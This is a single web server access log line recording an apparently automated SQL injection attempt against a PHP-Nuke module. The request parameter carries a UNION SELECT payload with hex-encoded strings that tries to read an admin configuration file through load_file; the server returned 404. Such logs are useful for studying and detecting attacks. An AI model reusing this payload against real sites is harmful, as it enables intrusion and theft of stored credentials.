87.106.9.138 - - [02/Mar/2008:07:07:03 -0800] "GET /nuke_authors/modules.php?name=NukeC&op=ViewCatg&id_catg=-1/**/union/**/select/**/0,1,2,3,4,5,6,7,8,9,10,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,concat(0x4861636B65642042792062696C6C67617465,0x3A,load_file(0x2e2f61646d696e2f70636f6e6669672e706870)/**/from/**/mysql.user/*/pwd,2/**/from/**/nuke_authors/*where%20admin%20-2 HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
